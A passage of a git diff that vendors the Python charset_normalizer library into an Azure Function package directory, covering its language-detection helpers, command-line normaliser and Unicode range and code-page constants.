Optional[str] = unicode_range(chunk) + + if character_range is None: + continue + + if is_unicode_range_secondary(character_range) is False: + if character_range not in seen_ranges: + seen_ranges[character_range] = 0 + seen_ranges[character_range] += 1 + character_count += 1 + + return sorted( + [ + character_range + for character_range in seen_ranges + if seen_ranges[character_range] / character_count >= 0.15 + ] + ) + + +def unicode_range_languages(primary_range: str) -> List[str]: + """ + Return inferred languages used with a unicode range. + """ + languages: List[str] = [] + + for language, characters in FREQUENCIES.items(): + for character in characters: + if unicode_range(character) == primary_range: + languages.append(language) + break + + return languages + + +@lru_cache() +def encoding_languages(iana_name: str) -> List[str]: + """ + Single-byte encoding language association. Some code page are heavily linked to particular language(s). + This function does the correspondence. + """ + unicode_ranges: List[str] = encoding_unicode_range(iana_name) + primary_range: Optional[str] = None + + for specified_range in unicode_ranges: + if "Latin" not in specified_range: + primary_range = specified_range + break + + if primary_range is None: + return ["Latin Based"] + + return unicode_range_languages(primary_range) + + +@lru_cache() +def mb_encoding_languages(iana_name: str) -> List[str]: + """ + Multi-byte encoding language association. Some code page are heavily linked to particular language(s). + This function does the correspondence. + """ + if ( + iana_name.startswith("shift_") + or iana_name.startswith("iso2022_jp") + or iana_name.startswith("euc_j") + or iana_name == "cp932" + ): + return ["Japanese"] + if iana_name.startswith("gb") or iana_name in ZH_NAMES: + return ["Chinese", "Classical Chinese"] + if iana_name.startswith("iso2022_kr") or iana_name in KO_NAMES: + return ["Korean"] + + return [] + + +@lru_cache(maxsize=LANGUAGE_SUPPORTED_COUNT) +def get_target_features(language: str) -> Tuple[bool, bool]: + """ + Determine main aspects from a supported language if it contains accents and if is pure Latin. + """ + target_have_accents: bool = False + target_pure_latin: bool = True + + for character in FREQUENCIES[language]: + if not target_have_accents and is_accentuated(character): + target_have_accents = True + if target_pure_latin and is_latin(character) is False: + target_pure_latin = False + + return target_have_accents, target_pure_latin + + +def alphabet_languages( + characters: List[str], ignore_non_latin: bool = False +) -> List[str]: + """ + Return associated languages associated to given characters. + """ + languages: List[Tuple[str, float]] = [] + + source_have_accents = any(is_accentuated(character) for character in characters) + + for language, language_characters in FREQUENCIES.items(): + + target_have_accents, target_pure_latin = get_target_features(language) + + if ignore_non_latin and target_pure_latin is False: + continue + + if target_have_accents is False and source_have_accents: + continue + + character_count: int = len(language_characters) + + character_match_count: int = len( + [c for c in language_characters if c in characters] + ) + + ratio: float = character_match_count / character_count + + if ratio >= 0.2: + languages.append((language, ratio)) + + languages = sorted(languages, key=lambda x: x[1], reverse=True) + + return [compatible_language[0] for compatible_language in languages] + + +def characters_popularity_compare( + language: str, ordered_characters: List[str] +) -> float: + """ + Determine if a ordered characters list (by occurrence from most appearance to rarest) match a particular language. + The result is a ratio between 0. (absolutely no correspondence) and 1. (near perfect fit). + Beware that is function is not strict on the match in order to ease the detection. (Meaning close match is 1.) + """ + if language not in FREQUENCIES: + raise ValueError("{} not available".format(language)) + + character_approved_count: int = 0 + FREQUENCIES_language_set = set(FREQUENCIES[language]) + + for character in ordered_characters: + if character not in FREQUENCIES_language_set: + continue + + characters_before_source: List[str] = FREQUENCIES[language][ + 0 : FREQUENCIES[language].index(character) + ] + characters_after_source: List[str] = FREQUENCIES[language][ + FREQUENCIES[language].index(character) : + ] + characters_before: List[str] = ordered_characters[ + 0 : ordered_characters.index(character) + ] + characters_after: List[str] = ordered_characters[ + ordered_characters.index(character) : + ] + + before_match_count: int = len( + set(characters_before) & set(characters_before_source) + ) + + after_match_count: int = len( + set(characters_after) & set(characters_after_source) + ) + + if len(characters_before_source) == 0 and before_match_count <= 4: + character_approved_count += 1 + continue + + if len(characters_after_source) == 0 and after_match_count <= 4: + character_approved_count += 1 + continue + + if ( + before_match_count / len(characters_before_source) >= 0.4 + or after_match_count / len(characters_after_source) >= 0.4 + ): + character_approved_count += 1 + continue + + return character_approved_count / len(ordered_characters) + + +def alpha_unicode_split(decoded_sequence: str) -> List[str]: + """ + Given a decoded text sequence, return a list of str. Unicode range / alphabet separation. + Ex. a text containing English/Latin with a bit a Hebrew will return two items in the resulting list; + One containing the latin letters and the other hebrew. + """ + layers: Dict[str, str] = {} + + for character in decoded_sequence: + if character.isalpha() is False: + continue + + character_range: Optional[str] = unicode_range(character) + + if character_range is None: + continue + + layer_target_range: Optional[str] = None + + for discovered_range in layers: + if ( + is_suspiciously_successive_range(discovered_range, character_range) + is False + ): + layer_target_range = discovered_range + break + + if layer_target_range is None: + layer_target_range = character_range + + if layer_target_range not in layers: + layers[layer_target_range] = character.lower() + continue + + layers[layer_target_range] += character.lower() + + return list(layers.values()) + + +def merge_coherence_ratios(results: List[CoherenceMatches]) -> CoherenceMatches: + """ + This function merge results previously given by the function coherence_ratio. + The return type is the same as coherence_ratio. + """ + per_language_ratios: Dict[str, List[float]] = {} + for result in results: + for sub_result in result: + language, ratio = sub_result + if language not in per_language_ratios: + per_language_ratios[language] = [ratio] + continue + per_language_ratios[language].append(ratio) + + merge = [ + ( + language, + round( + sum(per_language_ratios[language]) / len(per_language_ratios[language]), + 4, + ), + ) + for language in per_language_ratios + ] + + return sorted(merge, key=lambda x: x[1], reverse=True) + + +@lru_cache(maxsize=2048) +def coherence_ratio( + decoded_sequence: str, threshold: float = 0.1, lg_inclusion: Optional[str] = None +) -> CoherenceMatches: + """ + Detect ANY language that can be identified in given sequence. The sequence will be analysed by layers. + A layer = Character extraction by alphabets/ranges. + """ + + results: List[Tuple[str, float]] = [] + ignore_non_latin: bool = False + + sufficient_match_count: int = 0 + + lg_inclusion_list = lg_inclusion.split(",") if lg_inclusion is not None else [] + if "Latin Based" in lg_inclusion_list: + ignore_non_latin = True + lg_inclusion_list.remove("Latin Based") + + for layer in alpha_unicode_split(decoded_sequence): + sequence_frequencies: Counter = Counter(layer) + most_common = sequence_frequencies.most_common() + + character_count: int = sum(o for c, o in most_common) + + if character_count <= TOO_SMALL_SEQUENCE: + continue + + popular_character_ordered: List[str] = [c for c, o in most_common] + + for language in lg_inclusion_list or alphabet_languages( + popular_character_ordered, ignore_non_latin + ): + ratio: float = characters_popularity_compare( + language, popular_character_ordered + ) + + if ratio < threshold: + continue + elif ratio >= 0.8: + sufficient_match_count += 1 + + results.append((language, round(ratio, 4))) + + if sufficient_match_count >= 3: + break + + return sorted(results, key=lambda x: x[1], reverse=True) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..dfbcca9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__pycache__/normalizer.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__pycache__/normalizer.cpython-39.pyc new file mode 100644 index 0000000..e538e3c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__pycache__/normalizer.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/normalizer.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/normalizer.py new file mode 100644 index 0000000..894c507 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/normalizer.py @@ -0,0 +1,295 @@ +import argparse +import sys +from json import dumps +from os.path import abspath +from platform import python_version +from typing import List + +try: + from unicodedata2 import unidata_version +except ImportError: + from unicodedata import unidata_version + +from charset_normalizer import from_fp +from charset_normalizer.models import CliDetectionResult +from charset_normalizer.version import __version__ + + +def query_yes_no(question: str, default: str = "yes") -> bool: + """Ask a yes/no question via input() and return their answer. + + "question" is a string that is presented to the user. + "default" is the presumed answer if the user just hits . + It must be "yes" (the default), "no" or None (meaning + an answer is required of the user). + + The "answer" return value is True for "yes" or False for "no". + + Credit goes to (c) https://stackoverflow.com/questions/3041986/apt-command-line-interface-like-yes-no-input + """ + valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False} + if default is None: + prompt = " [y/n] " + elif default == "yes": + prompt = " [Y/n] " + elif default == "no": + prompt = " [y/N] " + else: + raise ValueError("invalid default answer: '%s'" % default) + + while True: + sys.stdout.write(question + prompt) + choice = input().lower() + if default is not None and choice == "": + return valid[default] + elif choice in valid: + return valid[choice] + else: + sys.stdout.write("Please respond with 'yes' or 'no' " "(or 'y' or 'n').\n") + + +def cli_detect(argv: List[str] = None) -> int: + """ + CLI assistant using ARGV and ArgumentParser + :param argv: + :return: 0 if everything is fine, anything else equal trouble + """ + parser = argparse.ArgumentParser( + description="The Real First Universal Charset Detector. " + "Discover originating encoding used on text file. " + "Normalize text to unicode." + ) + + parser.add_argument( + "files", type=argparse.FileType("rb"), nargs="+", help="File(s) to be analysed" + ) + parser.add_argument( + "-v", + "--verbose", + action="store_true", + default=False, + dest="verbose", + help="Display complementary information about file if any. " + "Stdout will contain logs about the detection process.", + ) + parser.add_argument( + "-a", + "--with-alternative", + action="store_true", + default=False, + dest="alternatives", + help="Output complementary possibilities if any. Top-level JSON WILL be a list.", + ) + parser.add_argument( + "-n", + "--normalize", + action="store_true", + default=False, + dest="normalize", + help="Permit to normalize input file. If not set, program does not write anything.", + ) + parser.add_argument( + "-m", + "--minimal", + action="store_true", + default=False, + dest="minimal", + help="Only output the charset detected to STDOUT. Disabling JSON output.", + ) + parser.add_argument( + "-r", + "--replace", + action="store_true", + default=False, + dest="replace", + help="Replace file when trying to normalize it instead of creating a new one.", + ) + parser.add_argument( + "-f", + "--force", + action="store_true", + default=False, + dest="force", + help="Replace file without asking if you are sure, use this flag with caution.", + ) + parser.add_argument( + "-t", + "--threshold", + action="store", + default=0.2, + type=float, + dest="threshold", + help="Define a custom maximum amount of chaos allowed in decoded content. 0. <= chaos <= 1.", + ) + parser.add_argument( + "--version", + action="version", + version="Charset-Normalizer {} - Python {} - Unicode {}".format( + __version__, python_version(), unidata_version + ), + help="Show version information and exit.", + ) + + args = parser.parse_args(argv) + + if args.replace is True and args.normalize is False: + print("Use --replace in addition of --normalize only.", file=sys.stderr) + return 1 + + if args.force is True and args.replace is False: + print("Use --force in addition of --replace only.", file=sys.stderr) + return 1 + + if args.threshold < 0.0 or args.threshold > 1.0: + print("--threshold VALUE should be between 0. AND 1.", file=sys.stderr) + return 1 + + x_ = [] + + for my_file in args.files: + + matches = from_fp(my_file, threshold=args.threshold, explain=args.verbose) + + best_guess = matches.best() + + if best_guess is None: + print( + 'Unable to identify originating encoding for "{}". {}'.format( + my_file.name, + "Maybe try increasing maximum amount of chaos." + if args.threshold < 1.0 + else "", + ), + file=sys.stderr, + ) + x_.append( + CliDetectionResult( + abspath(my_file.name), + None, + [], + [], + "Unknown", + [], + False, + 1.0, + 0.0, + None, + True, + ) + ) + else: + x_.append( + CliDetectionResult( + abspath(my_file.name), + best_guess.encoding, + best_guess.encoding_aliases, + [ + cp + for cp in best_guess.could_be_from_charset + if cp != best_guess.encoding + ], + best_guess.language, + best_guess.alphabets, + best_guess.bom, + best_guess.percent_chaos, + best_guess.percent_coherence, + None, + True, + ) + ) + + if len(matches) > 1 and args.alternatives: + for el in matches: + if el != best_guess: + x_.append( + CliDetectionResult( + abspath(my_file.name), + el.encoding, + el.encoding_aliases, + [ + cp + for cp in el.could_be_from_charset + if cp != el.encoding + ], + el.language, + el.alphabets, + el.bom, + el.percent_chaos, + el.percent_coherence, + None, + False, + ) + ) + + if args.normalize is True: + + if best_guess.encoding.startswith("utf") is True: + print( + '"{}" file does not need to be normalized, as it already came from unicode.'.format( + my_file.name + ), + file=sys.stderr, + ) + if my_file.closed is False: + my_file.close() + continue + + o_: List[str] = my_file.name.split(".") + + if args.replace is False: + o_.insert(-1, best_guess.encoding) + if my_file.closed is False: + my_file.close() + elif ( + args.force is False + and query_yes_no( + 'Are you sure to normalize "{}" by replacing it ?'.format( + my_file.name + ), + "no", + ) + is False + ): + if my_file.closed is False: + my_file.close() + continue + + try: + x_[0].unicode_path = abspath("./{}".format(".".join(o_))) + + with open(x_[0].unicode_path, "w", encoding="utf-8") as fp: + fp.write(str(best_guess)) + except IOError as e: + print(str(e), file=sys.stderr) + if my_file.closed is False: + my_file.close() + return 2 + + if my_file.closed is False: + my_file.close() + + if args.minimal is False: + print( + dumps( + [el.__dict__ for el in x_] if len(x_) > 1 else x_[0].__dict__, + ensure_ascii=True, + indent=4, + ) + ) + else: + for my_file in args.files: + print( + ", ".join( + [ + el.encoding or "undefined" + for el in x_ + if el.path == abspath(my_file.name) + ] + ) + ) + + return 0 + + +if __name__ == "__main__": + cli_detect() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/constant.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/constant.py new file mode 100644 index 0000000..8daa3b6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/constant.py @@ -0,0 +1,497 @@ +from codecs import BOM_UTF8, BOM_UTF16_BE, BOM_UTF16_LE, BOM_UTF32_BE, BOM_UTF32_LE +from encodings.aliases import aliases +from re import IGNORECASE, compile as re_compile +from typing import Dict, List, Set, Union + +from .assets import FREQUENCIES + +# Contain for each eligible encoding a list of/item bytes SIG/BOM +ENCODING_MARKS: Dict[str, Union[bytes, List[bytes]]] = { + "utf_8": BOM_UTF8, + "utf_7": [ + b"\x2b\x2f\x76\x38", + b"\x2b\x2f\x76\x39", + b"\x2b\x2f\x76\x2b", + b"\x2b\x2f\x76\x2f", + b"\x2b\x2f\x76\x38\x2d", + ], + "gb18030": b"\x84\x31\x95\x33", + "utf_32": [BOM_UTF32_BE, BOM_UTF32_LE], + "utf_16": [BOM_UTF16_BE, BOM_UTF16_LE], +} + +TOO_SMALL_SEQUENCE: int = 32 +TOO_BIG_SEQUENCE: int = int(10e6) + +UTF8_MAXIMAL_ALLOCATION: int = 1112064 + +UNICODE_RANGES_COMBINED: Dict[str, range] = { + "Control character": range(31 + 1), + "Basic Latin": range(32, 127 + 1), + "Latin-1 Supplement": range(128, 255 + 1), + "Latin Extended-A": range(256, 383 + 1), + "Latin Extended-B": range(384, 591 + 1), + "IPA Extensions": range(592, 687 + 1), + "Spacing Modifier Letters": range(688, 767 + 1), + "Combining Diacritical Marks": range(768, 879 + 1), + "Greek and Coptic": range(880, 1023 + 1), + "Cyrillic": range(1024, 1279 + 1), + "Cyrillic Supplement": range(1280, 1327 + 1), + "Armenian": range(1328, 1423 + 1), + "Hebrew": range(1424, 1535 + 1), + "Arabic": range(1536, 1791 + 1), + "Syriac": range(1792, 1871 + 1), + "Arabic Supplement": range(1872, 1919 + 1), + "Thaana": range(1920, 1983 + 1), + "NKo": range(1984, 2047 + 1), + "Samaritan": range(2048, 2111 + 1), + "Mandaic": range(2112, 2143 + 1), + "Syriac Supplement": range(2144, 2159 + 1), + "Arabic Extended-A": range(2208, 2303 + 1), + "Devanagari": range(2304, 2431 + 1), + "Bengali": range(2432, 2559 + 1), + "Gurmukhi": range(2560, 2687 + 1), + "Gujarati": range(2688, 2815 + 1), + "Oriya": range(2816, 2943 + 1), + "Tamil": range(2944, 3071 + 1), + "Telugu": range(3072, 3199 + 1), + "Kannada": range(3200, 3327 + 1), + "Malayalam": range(3328, 3455 + 1), + "Sinhala": range(3456, 3583 + 1), + "Thai": range(3584, 3711 + 1), + "Lao": range(3712, 3839 + 1), + "Tibetan": range(3840, 4095 + 1), + "Myanmar": range(4096, 4255 + 1), + "Georgian": range(4256, 4351 + 1), + "Hangul Jamo": range(4352, 4607 + 1), + "Ethiopic": range(4608, 4991 + 1), + "Ethiopic Supplement": range(4992, 5023 + 1), + "Cherokee": range(5024, 5119 + 1), + "Unified Canadian Aboriginal Syllabics": range(5120, 5759 + 1), + "Ogham": range(5760, 5791 + 1), + "Runic": range(5792, 5887 + 1), + "Tagalog": range(5888, 5919 + 1), + "Hanunoo": range(5920, 5951 + 1), + "Buhid": range(5952, 5983 + 1), + "Tagbanwa": range(5984, 6015 + 1), + "Khmer": range(6016, 6143 + 1), + "Mongolian": range(6144, 6319 + 1), + "Unified Canadian Aboriginal Syllabics Extended": range(6320, 6399 + 1), + "Limbu": range(6400, 6479 + 1), + "Tai Le": range(6480, 6527 + 1), + "New Tai Lue": range(6528, 6623 + 1), + "Khmer Symbols": range(6624, 6655 + 1), + "Buginese": range(6656, 6687 + 1), + "Tai Tham": range(6688, 6831 + 1), + "Combining Diacritical Marks Extended": range(6832, 6911 + 1), + "Balinese": range(6912, 7039 + 1), + "Sundanese": range(7040, 7103 + 1), + "Batak": range(7104, 7167 + 1), + "Lepcha": range(7168, 7247 + 1), + "Ol Chiki": range(7248, 7295 + 1), + "Cyrillic Extended C": range(7296, 7311 + 1), + "Sundanese Supplement": range(7360, 7375 + 1), + "Vedic Extensions": range(7376, 7423 + 1), + "Phonetic Extensions": range(7424, 7551 + 1), + "Phonetic Extensions Supplement": range(7552, 7615 + 1), + "Combining Diacritical Marks Supplement": range(7616, 7679 + 1), + "Latin Extended Additional": range(7680, 7935 + 1), + "Greek Extended": range(7936, 8191 + 1), + "General Punctuation": range(8192, 8303 + 1), + "Superscripts and Subscripts": range(8304, 8351 + 1), + "Currency Symbols": range(8352, 8399 + 1), + "Combining Diacritical Marks for Symbols": range(8400, 8447 + 1), + "Letterlike Symbols": range(8448, 8527 + 1), + "Number Forms": range(8528, 8591 + 1), + "Arrows": range(8592, 8703 + 1), + "Mathematical Operators": range(8704, 8959 + 1), + "Miscellaneous Technical": range(8960, 9215 + 1), + "Control Pictures": range(9216, 9279 + 1), + "Optical Character Recognition": range(9280, 9311 + 1), + "Enclosed Alphanumerics": range(9312, 9471 + 1), + "Box Drawing": range(9472, 9599 + 1), + "Block Elements": range(9600, 9631 + 1), + "Geometric Shapes": range(9632, 9727 + 1), + "Miscellaneous Symbols": range(9728, 9983 + 1), + "Dingbats": range(9984, 10175 + 1), + "Miscellaneous Mathematical Symbols-A": range(10176, 10223 + 1), + "Supplemental Arrows-A": range(10224, 10239 + 1), + "Braille Patterns": range(10240, 10495 + 1), + "Supplemental Arrows-B": range(10496, 10623 + 1), + "Miscellaneous Mathematical Symbols-B": range(10624, 10751 + 1), + "Supplemental Mathematical Operators": range(10752, 11007 + 1), + "Miscellaneous Symbols and Arrows": range(11008, 11263 + 1), + "Glagolitic": range(11264, 11359 + 1), + "Latin Extended-C": range(11360, 11391 + 1), + "Coptic": range(11392, 11519 + 1), + "Georgian Supplement": range(11520, 11567 + 1), + "Tifinagh": range(11568, 11647 + 1), + "Ethiopic Extended": range(11648, 11743 + 1), + "Cyrillic Extended-A": range(11744, 11775 + 1), + "Supplemental Punctuation": range(11776, 11903 + 1), + "CJK Radicals Supplement": range(11904, 12031 + 1), + "Kangxi Radicals": range(12032, 12255 + 1), + "Ideographic Description Characters": range(12272, 12287 + 1), + "CJK Symbols and Punctuation": range(12288, 12351 + 1), + "Hiragana": range(12352, 12447 + 1), + "Katakana": range(12448, 12543 + 1), + "Bopomofo": range(12544, 12591 + 1), + "Hangul Compatibility Jamo": range(12592, 12687 + 1), + "Kanbun": range(12688, 12703 + 1), + "Bopomofo Extended": range(12704, 12735 + 1), + "CJK Strokes": range(12736, 12783 + 1), + "Katakana Phonetic Extensions": range(12784, 12799 + 1), + "Enclosed CJK Letters and Months": range(12800, 13055 + 1), + "CJK Compatibility": range(13056, 13311 + 1), + "CJK Unified Ideographs Extension A": range(13312, 19903 + 1), + "Yijing Hexagram Symbols": range(19904, 19967 + 1), + "CJK Unified Ideographs": range(19968, 40959 + 1), + "Yi Syllables": range(40960, 42127 + 1), + "Yi Radicals": range(42128, 42191 + 1), + "Lisu": range(42192, 42239 + 1), + "Vai": range(42240, 42559 + 1), + "Cyrillic Extended-B": range(42560, 42655 + 1), + "Bamum": range(42656, 42751 + 1), + "Modifier Tone Letters": range(42752, 42783 + 1), + "Latin Extended-D": range(42784, 43007 + 1), + "Syloti Nagri": range(43008, 43055 + 1), + "Common Indic Number Forms": range(43056, 43071 + 1), + "Phags-pa": range(43072, 43135 + 1), + "Saurashtra": range(43136, 43231 + 1), + "Devanagari Extended": range(43232, 43263 + 1), + "Kayah Li": range(43264, 43311 + 1), + "Rejang": range(43312, 43359 + 1), + "Hangul Jamo Extended-A": range(43360, 43391 + 1), + "Javanese": range(43392, 43487 + 1), + "Myanmar Extended-B": range(43488, 43519 + 1), + "Cham": range(43520, 43615 + 1), + "Myanmar Extended-A": range(43616, 43647 + 1), + "Tai Viet": range(43648, 43743 + 1), + "Meetei Mayek Extensions": range(43744, 43775 + 1), + "Ethiopic Extended-A": range(43776, 43823 + 1), + "Latin Extended-E": range(43824, 43887 + 1), + "Cherokee Supplement": range(43888, 43967 + 1), + "Meetei Mayek": range(43968, 44031 + 1), + "Hangul Syllables": range(44032, 55215 + 1), + "Hangul Jamo Extended-B": range(55216, 55295 + 1), + "High Surrogates": range(55296, 56191 + 1), + "High Private Use Surrogates": range(56192, 56319 + 1), + "Low Surrogates": range(56320, 57343 + 1), + "Private Use Area": range(57344, 63743 + 1), + "CJK Compatibility Ideographs": range(63744, 64255 + 1), + "Alphabetic Presentation Forms": range(64256, 64335 + 1), + "Arabic Presentation Forms-A": range(64336, 65023 + 1), + "Variation Selectors": range(65024, 65039 + 1), + "Vertical Forms": range(65040, 65055 + 1), + "Combining Half Marks": range(65056, 65071 + 1), + "CJK Compatibility Forms": range(65072, 65103 + 1), + "Small Form Variants": range(65104, 65135 + 1), + "Arabic Presentation Forms-B": range(65136, 65279 + 1), + "Halfwidth and Fullwidth Forms": range(65280, 65519 + 1), + "Specials": range(65520, 65535 + 1), + "Linear B Syllabary": range(65536, 65663 + 1), + "Linear B Ideograms": range(65664, 65791 + 1), + "Aegean Numbers": range(65792, 65855 + 1), + "Ancient Greek Numbers": range(65856, 65935 + 1), + "Ancient Symbols": range(65936, 65999 + 1), + "Phaistos Disc": range(66000, 66047 + 1), + "Lycian": range(66176, 66207 + 1), + "Carian": range(66208, 66271 + 1), + "Coptic Epact Numbers": range(66272, 66303 + 1), + "Old Italic": range(66304, 66351 + 1), + "Gothic": range(66352, 66383 + 1), + "Old Permic": range(66384, 66431 + 1), + "Ugaritic": range(66432, 66463 + 1), + "Old Persian": range(66464, 66527 + 1), + "Deseret": range(66560, 66639 + 1), + "Shavian": range(66640, 66687 + 1), + "Osmanya": range(66688, 66735 + 1), + "Osage": range(66736, 66815 + 1), + "Elbasan": range(66816, 66863 + 1), + "Caucasian Albanian": range(66864, 66927 + 1), + "Linear A": range(67072, 67455 + 1), + "Cypriot Syllabary": range(67584, 67647 + 1), + "Imperial Aramaic": range(67648, 67679 + 1), + "Palmyrene": range(67680, 67711 + 1), + "Nabataean": range(67712, 67759 + 1), + "Hatran": range(67808, 67839 + 1), + "Phoenician": range(67840, 67871 + 1), + "Lydian": range(67872, 67903 + 1), + "Meroitic Hieroglyphs": range(67968, 67999 + 1), + "Meroitic Cursive": range(68000, 68095 + 1), + "Kharoshthi": range(68096, 68191 + 1), + "Old South Arabian": range(68192, 68223 + 1), + "Old North Arabian": range(68224, 68255 + 1), + "Manichaean": range(68288, 68351 + 1), + "Avestan": range(68352, 68415 + 1), + "Inscriptional Parthian": range(68416, 68447 + 1), + "Inscriptional Pahlavi": range(68448, 68479 + 1), + "Psalter Pahlavi": range(68480, 68527 + 1), + "Old Turkic": range(68608, 68687 + 1), + "Old Hungarian": range(68736, 68863 + 1), + "Rumi Numeral Symbols": range(69216, 69247 + 1), + "Brahmi": range(69632, 69759 + 1), + "Kaithi": range(69760, 69839 + 1), + "Sora Sompeng": range(69840, 69887 + 1), + "Chakma": range(69888, 69967 + 1), + "Mahajani": range(69968, 70015 + 1), + "Sharada": range(70016, 70111 + 1), + "Sinhala Archaic Numbers": range(70112, 70143 + 1), + "Khojki": range(70144, 70223 + 1), + "Multani": range(70272, 70319 + 1), + "Khudawadi": range(70320, 70399 + 1), + "Grantha": range(70400, 70527 + 1), + "Newa": range(70656, 70783 + 1), + "Tirhuta": range(70784, 70879 + 1), + "Siddham": range(71040, 71167 + 1), + "Modi": range(71168, 71263 + 1), + "Mongolian Supplement": range(71264, 71295 + 1), + "Takri": range(71296, 71375 + 1), + "Ahom": range(71424, 71487 + 1), + "Warang Citi": range(71840, 71935 + 1), + "Zanabazar Square": range(72192, 72271 + 1), + "Soyombo": range(72272, 72367 + 1), + "Pau Cin Hau": range(72384, 72447 + 1), + "Bhaiksuki": range(72704, 72815 + 1), + "Marchen": range(72816, 72895 + 1), + "Masaram Gondi": range(72960, 73055 + 1), + "Cuneiform": range(73728, 74751 + 1), + "Cuneiform Numbers and Punctuation": range(74752, 74879 + 1), + "Early Dynastic Cuneiform": range(74880, 75087 + 1), + "Egyptian Hieroglyphs": range(77824, 78895 + 1), + "Anatolian Hieroglyphs": range(82944, 83583 + 1), + "Bamum Supplement": range(92160, 92735 + 1), + "Mro": range(92736, 92783 + 1), + "Bassa Vah": range(92880, 92927 + 1), + "Pahawh Hmong": range(92928, 93071 + 1), + "Miao": range(93952, 94111 + 1), + "Ideographic Symbols and Punctuation": range(94176, 94207 + 1), + "Tangut": range(94208, 100351 + 1), + "Tangut Components": range(100352, 101119 + 1), + "Kana Supplement": range(110592, 110847 + 1), + "Kana Extended-A": range(110848, 110895 + 1), + "Nushu": range(110960, 111359 + 1), + "Duployan": range(113664, 113823 + 1), + "Shorthand Format Controls": range(113824, 113839 + 1), + "Byzantine Musical Symbols": range(118784, 119039 + 1), + "Musical Symbols": range(119040, 119295 + 1), + "Ancient Greek Musical Notation": range(119296, 119375 + 1), + "Tai Xuan Jing Symbols": range(119552, 119647 + 1), + "Counting Rod Numerals": range(119648, 119679 + 1), + "Mathematical Alphanumeric Symbols": range(119808, 120831 + 1), + "Sutton SignWriting": range(120832, 121519 + 1), + "Glagolitic Supplement": range(122880, 122927 + 1), + "Mende Kikakui": range(124928, 125151 + 1), + "Adlam": range(125184, 125279 + 1), + "Arabic Mathematical Alphabetic Symbols": range(126464, 126719 + 1), + "Mahjong Tiles": range(126976, 127023 + 1), + "Domino Tiles": range(127024, 127135 + 1), + "Playing Cards": range(127136, 127231 + 1), + "Enclosed Alphanumeric Supplement": range(127232, 127487 + 1), + "Enclosed Ideographic Supplement": range(127488, 127743 + 1), + "Miscellaneous Symbols and Pictographs": range(127744, 128511 + 1), + "Emoticons range(Emoji)": range(128512, 128591 + 1), + "Ornamental Dingbats": range(128592, 128639 + 1), + "Transport and Map Symbols": range(128640, 128767 + 1), + "Alchemical Symbols": range(128768, 128895 + 1), + "Geometric Shapes Extended": range(128896, 129023 + 1), + "Supplemental Arrows-C": range(129024, 129279 + 1), + "Supplemental Symbols and Pictographs": range(129280, 129535 + 1), + "CJK Unified Ideographs Extension B": range(131072, 173791 + 1), + "CJK Unified Ideographs Extension C": range(173824, 177983 + 1), + "CJK Unified Ideographs Extension D": range(177984, 178207 + 1), + "CJK Unified Ideographs Extension E": range(178208, 183983 + 1), + "CJK Unified Ideographs Extension F": range(183984, 191471 + 1), + "CJK Compatibility Ideographs Supplement": range(194560, 195103 + 1), + "Tags": range(917504, 917631 + 1), + "Variation Selectors Supplement": range(917760, 917999 + 1), +} + + +UNICODE_SECONDARY_RANGE_KEYWORD: List[str] = [ + "Supplement", + "Extended", + "Extensions", + "Modifier", + "Marks", + "Punctuation", + "Symbols", + "Forms", + "Operators", + "Miscellaneous", + "Drawing", + "Block", + "Shapes", + "Supplemental", + "Tags", +] + +RE_POSSIBLE_ENCODING_INDICATION = re_compile( + r"(?:(?:encoding)|(?:charset)|(?:coding))(?:[\:= ]{1,10})(?:[\"\']?)([a-zA-Z0-9\-_]+)(?:[\"\']?)", + IGNORECASE, +) + +IANA_SUPPORTED: List[str] = sorted( + filter( + lambda x: x.endswith("_codec") is False + and x not in {"rot_13", "tactis", "mbcs"}, + list(set(aliases.values())), + ) +) + +IANA_SUPPORTED_COUNT: int = len(IANA_SUPPORTED) + +# pre-computed code page that are similar using the function cp_similarity. +IANA_SUPPORTED_SIMILAR: Dict[str, List[str]] = { + "cp037": ["cp1026", "cp1140", "cp273", "cp500"], + "cp1026": ["cp037", "cp1140", "cp273", "cp500"], + "cp1125": ["cp866"], + "cp1140": ["cp037", "cp1026", "cp273", "cp500"], + "cp1250": ["iso8859_2"], + "cp1251": ["kz1048", "ptcp154"], + "cp1252": ["iso8859_15", "iso8859_9", "latin_1"], + "cp1253": ["iso8859_7"], + "cp1254": ["iso8859_15", "iso8859_9", "latin_1"], + "cp1257": ["iso8859_13"], + "cp273": ["cp037", "cp1026", "cp1140", "cp500"], + "cp437": ["cp850", "cp858", "cp860", "cp861", "cp862", "cp863", "cp865"], + "cp500": ["cp037", "cp1026", "cp1140", "cp273"], + "cp850": ["cp437", "cp857", "cp858", "cp865"], + "cp857": ["cp850", "cp858", "cp865"], + "cp858": ["cp437", "cp850", "cp857", "cp865"], + "cp860": ["cp437", "cp861", "cp862", "cp863", "cp865"], + "cp861": ["cp437", "cp860", "cp862", "cp863", "cp865"], + "cp862": ["cp437", "cp860", "cp861", "cp863", "cp865"], + "cp863": ["cp437", "cp860", "cp861", "cp862", "cp865"], + "cp865": ["cp437", "cp850", "cp857", "cp858", "cp860", 